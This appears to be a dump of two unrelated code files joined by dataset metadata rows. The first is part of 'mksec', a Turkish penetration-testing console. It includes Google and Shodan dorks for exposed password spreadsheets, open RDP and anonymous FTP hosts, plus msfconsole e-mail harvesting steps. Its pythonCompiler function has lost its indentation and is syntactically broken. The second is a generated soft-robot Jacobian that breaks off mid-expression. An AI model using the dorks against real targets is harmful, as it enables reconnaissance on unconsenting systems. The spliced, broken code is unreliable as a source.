çıkar\ngzip [dosya] –> dosya sıkıştır ve dosya.gz olarak yeniden adlandır\ngzip -d [dosya.gz] –> dosya.gz'yi dosya olarak geri çıkar\n\x1b[33mAğ\n==\x1b[37m\nping [host] –> host'a ping at ve sonucu göster\nwhois [domain] –> domain için whois bilgisi\ndig [domain] –> domain için DNS bilgisi\ndig -x [host] –> host çözümünü ters çevir\nwget [dosya] –> dosya indir\nwget -c [dosya] –> durdurulmuş indirmeye devam\n\x1b[33mDosya İzinleri\n==============\x1b[37m\nchmod [kod] [dosya] –> dosya izinlerini değiştir. bu izinler farklı kategorilere göre değişir (kullanıcı, grup ve herkes gibi):\n• 4 = okuma (r) \n• 2 = yazma (w)\n• 1 = çalıştırma (x)\nörnekler:\nchmod 777 –> herkes için oku, yaz, çalıştır\nchmod 755 –> rwx sahibi için, rx grup ve herkes için.\ndaha fazlası için: man chmod\n\x1b[33mKurulum\n=======\x1b[37m\nKaynaktan kurulum:\n./configure\nmake\nmake install\ndpkg -i [pkg.deb] –> paket kurulumu (Debian)\nrpm -Uvh [pkg.rpm] – paket kurulumu (RPM)\n\x1b[33mSSH\n===\x1b[37m\nssh [kullanıcı@host] –> kullanıcı olarak sunucuya bağlan\nssh -p port [user@host] –> kullanıcı olarak port üzerinden sunucuya bağlan\nssh-copy-id [user@host] –> kullanıcı için anahtarı ekleyin ve anahtarla ve şifresiz olarak oturum açın\n\x1b[33mArama\n=====\x1b[37m\ngrep [pattern] [dosyalar] –> dosyalarda kalıp arayın\ngrep -r [pattern] [dir] –> dizin içinde kalıbı tekrarlayarak arayın\n[komut] | grep [pattern] –> komut çıktısında kalıp arayın\nlocate [dosya] –> dosya'nın tüm örneklerini arayın\n\x1b[33mKısayollar\n==========\x1b[37m\nCtrl+C –> şu anki komutu durdurur\nCtrl+Z –> şu anki komutu durdurur, önde fg ile veya arkada bg ile komut işlemini kaldığı yerden sürdürür\nCtrl+D –> exit gibi oturumu kapatır\nCtrl+W –> satırdaki bir kelimeyi siler\nCtrl+U –> tüm satırı siler\nCtrl+R –> son komutu öne getir\nCtrl+P –> son komutu göster\n!! -> son komutu tekrar et\nexit –> oturumdan çık\x1b[37m\n")
        UserInputs(uinput+"lin")
def informationGatheringMore():
    """Clear the screen, print extra OSINT notes (whois, Google/Shodan
    dorks, msfconsole e-mail collector; mostly Turkish), then loop on the
    prompt, routing input to the 'information' menu handler."""
    os.system("clear")
    print("\x1b[1m\x1b[33mMore about Information Gathering\x1b[37m\n\x1b[32m'archive.org'\x1b[37m sitesinden, hedef sitenin gecmis ekran goruntulerini inceleyebilirsiniz.\n\n\x1b[32mwhois\x1b[37m: domainin bilgilerini icerir. domainin kayit ve suresinin bitis tarihi, host edildigi firmanin name server bilgileri de yer alir.\n\x1b[36mex: whois microsoft.com\x1b[37m\n\n\x1b[32mbing:\x1b[37m ip addr aramasi yaparak subdomain bulmak. \x1b[36mex:\x1b[37m site:168.148.56.21\n\n\x1b[32mping:\x1b[37m ping atarak ip adresini ogrenebilirsiniz \x1b[36mex:\x1b[37m google.com\n\n\x1b[32mgoogle dorks\x1b[37m\n\x1b[32m============\x1b[37m\n\x1b[37m\x1b[36msite:\x1b[37mmertkaragoz.com\n\x1b[36mfiletype:\x1b[37mpdf\n\x1b[36minurl:\x1b[37madmin\n\x1b[36mintitle:\x1b[37mlinux nedir\n\x1b[36mintext:\x1b[37mlinux isletim sistemidir\n\x1b[36mcache:\x1b[37mmertkaragoz.com\n\x1b[33mex:\x1b[37m intitle:webcam 7 inurl:8080 -intext:8080\n\x1b[33mex:\x1b[37m xls 'username | password' site:.com\n\n\x1b[32mshodan dorks\x1b[37m\n\x1b[32m============\x1b[37m\n\x1b[36mproduct:\x1b[37mngnix\n\x1b[36mcity:\x1b[37mistanbul\n\x1b[36mcountry:\x1b[37mTR\n\x1b[36mport:\x1b[37m3389\n\x1b[36mhostname:\x1b[37mgoogle.com\n\x1b[36mnet\x1b[37m:178.156.32.48\n\x1b[36mos:\x1b[37mlinux\n\x1b[32mex:\x1b[37m product:cisco country:TR\n\x1b[32mex:\x1b[37m product:nginx city:dallas country:US port:8080 os:linux\n\x1b[32mex:\x1b[37m country:TR port:3389\n\x1b[32mex:\x1b[37m country:TR port:21 'anonymous user logged in'\n\x1b[32mex:\x1b[37m country:TR port:1434\n\x1b[32mex:\x1b[37m Cisco 200 OK\n\n\x1b[36mmsfconsole\x1b[37m ile e-mail bilgileri toplamak icin konsola sirasiyla yaziniz\n\x1b[33m1)\x1b[37m msfconsole\n\x1b[33m2)\x1b[37m use auxiliary/gather/search_email_collector\n\x1b[33m3)\x1b[37m show options\n\x1b[33m4)\x1b[37m set DOMAIN nasa.gov\n\x1b[33m5)\x1b[37m run\x1b[37m\n")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[information_gathering_more]\033[37m\x1b[0m ")
        UserInputs(uinput+"information")
def about():
    """Print the mksec about/credits/disclaimer text, then loop on the
    prompt, routing input back to the main-menu handler."""
    print("""\x1b[1m\x1b[36m©Copyright 2021 mksec\n\n\x1b[0mversion: 1.08\x1b[37m\x1b[1m\n\n\x1b[33mWritten by:\x1b[37m Mert Karagoz (generatorexit) @generatorexit\n\n\x1b[31mDISCLAIMER:\x1b[37m This is *only* for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.\nplease read the license under readme/license for the licensing of mksec.\n\n\x1b[33m[mksec Tutorial]\x1b[37m\nFor a full document on how to use mksec, [Visit the mksec user manual] (https://github.com/generatorexit/mksec/raw/master/readme/user_manual.pdf)\n\n\x1b[33m[Features]\x1b[37m\nmksec, linux icin hazirlanmis acik kaynakli bir sizma testi aracidir. mksec, sizma testi araclarini daha hizli bir sekilde kullanmanizi saglar.\nMert Karagoz tarafindan hazirlanan araclari da icerisinde bulundurur. hicbir sirketin, firmanin or hacker grubunun urunu degildir.\n\n\x1b[33m[Bugs and Enhancements]\x1b[37m\nFor bug reports or enhancements, please open an [issue]\n(https://github.com/generatorexit/mksec/issues) here.\n\n\x1b[33m[Supported Platforms]\x1b[37m\nKali Linux\n\n\x1b[33m[Install mksec]\x1b[37m\nkurulum yazilacak\n\n\x1b[33m[mksec Development Team]\x1b[37m\n@generatorexit\n\n\x1b[33m[Former Developers of mksec]\x1b[37m\n@generatorexit\n\nSpecial thanks to the following person who has contributed to mksec:\n@nidagonder\n\x1b[37m""")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[about]\033[37m\x1b[0m ")
        UserInputs(uinput+"mainmenu")
def help():
    """Print the console's command reference (core + tool commands), then
    loop forever handing each typed line to the global input dispatcher.

    NOTE: intentionally keeps the original name even though it shadows the
    builtin ``help`` — callers elsewhere in the file invoke it by this name.
    """
    print("""\x1b[1m\x1b[36mCore Commands\x1b[37m\n\x1b[36m=============\x1b[37m\n\n\x1b[33mCommand\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===========\x1b[37m\n? Help menu\nhelp Help menu\nclear Clears the screen\nabout Shows information about "mksec"\nno banner Remove Banner\nbanner Adds banners. If there is a banner it will change it\nexit Exit the console\nquit Exit the console\n\n\x1b[36mTool Commands\x1b[37m\n\x1b[36m=============\x1b[37m\n\n\x1b[33mCommand\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===========\x1b[37m\ninfo Displays information about tool\noptions Displays global options for tool\nset Sets a context-specific variable to a value\nrun Runs the tool\nclear Clears the screen\nback Move back from the current context\nexit Exit the console\nquit Exit the console\n\x1b[37m""")
    # Same prompt-and-dispatch cycle used by the other menu screens.
    while True:
        entered = input("\x1b[1m\033[36m[mksec]\033[36m[help]\033[37m\x1b[0m ")
        UserInputs(entered + "mainmenu")
#mksectools
def pythonCompiler():
# Interactive "python compiler" menu: byte-compiles a user-supplied .py file
# to .pyc with the stdlib py_compile module, or navigates back to the tools menu.
import py_compile
# Draw the menu banner via the shell (echo of an ANSI-colored ASCII box).
os.system("""echo \x1b[1m'
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
| |
| python compiler |
| |
| .py uzantili dosyayi .pyc uzantili dosyaya cevirir |
| |
| 1 python compiler |
| |
| back go back |
| |
|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-|'
""")
# Read the user's menu choice.
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
if uinput == "1":
# Show an example path, then ask for the source file to compile.
os.system("echo 'ex: /root/Desktop/mksec.py'")
userfile = input("\x1b[1m\033[36m[mksec]\033[36m[file.location]\033[37m\x1b[0m ")
# Byte-compile the given file; py_compile writes the .pyc alongside it.
# NOTE(review): an invalid path raises from py_compile.compile — confirm
# whether upstream handles that (this function does not).
py_compile.compile(userfile)
elif uinput == "back":
os.system("clear")
mksectools()  # defined elsewhere in this file: returns to the tools menu
else:
# Unrecognized input: clear the screen and redraw this menu.
# NOTE(review): this recurses rather than loops, so repeated invalid
# input grows the call stack — confirm acceptable for this console.
os.system("clear")
pythonCompiler()
# Presumably falls through to the main menu once the action completes —
# TODO confirm original nesting (indentation was lost in this copy).
MainMenu()
except KeyboardInterrupt:
print("\x1b[1mUse the 'exit' command to quit.")
NoBanner()
| 227.298878
| 97,439
| 0.639028
| 50,710
| 384,817
| 4.799862
| 0.070972
| 0.021126
| 0.018587
| 0.022843
| 0.81565
| 0.784919
| 0.763608
| 0.751353
| 0.733744
| 0.716086
| 0
| 0.057595
| 0.258201
| 384,817
| 1,693
| 97,440
| 227.298878
| 0.794421
| 0.001273
| 0
| 0.566227
| 0
| 0.14752
| 0.851148
| 0.213957
| 0
| 0
| 0.000021
| 0
| 0
| 1
| 0.042687
| false
| 0.035154
| 0.003766
| 0
| 0.047709
| 0.090395
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ba97e8b89e03e002ce5ef8254e5e6db82e790541
| 139,433
|
py
|
Python
|
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, xi):
return numpy.array([[-99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (2*q[0, 0] - q[1, 0] - q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 320703916.631818*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 10147272.3621786*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 199774.424630392*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] + 2106.99588477366*q[1, 0] + 2106.99588477366*q[2, 0] + 
948.148148148148)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((2*q[0, 0] - q[1, 0] - q[2, 0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 9621117498.95455*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 243534536.692287*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 3595939.64334705*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 25283.9506172839*q[0, 0]**2 - 25283.9506172839*q[0, 0]*q[1, 0] - 25283.9506172839*q[0, 0]*q[2, 0] + 25283.9506172839*q[1, 0]**2 - 25283.9506172839*q[1, 0]*q[2, 0] + 25283.9506172839*q[2, 0]**2 - 53.3333333333333) 
+ (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-102625253322.182*q[0, 0] + 51312626661.0909*q[1, 0] + 51312626661.0909*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + (-63927815.8817253*q[0, 0] + 31963907.9408627*q[1, 0] + 31963907.9408627*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (674238.683127572*q[0, 0] - 337119.341563786*q[1, 0] - 337119.341563786*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) 
+ (16035195.8315909*q[0, 0] - 8017597.91579545*q[1, 0] - 8017597.91579545*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 2844.44444444444*q[0, 0] + 1422.22222222222*q[1, 0] + 1422.22222222222*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 25656313330.5455*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 
0]*q[2, 0] + q[2, 0]**2)**4 + 811781788.97429*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 15981953.9704313*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 168559.670781893*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 711.111111111111*numpy.sqrt(3)*(q[1, 0] - q[2, 0])) - 17.7777777777778*q[0, 0] - 4.44444444444444*q[1, 0] - 4.44444444444444*q[2, 0] - 4.0, -160351958.315909*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + 
q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-1053.49794238683*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0] - 474.074074074074)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-2405279374.73864*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 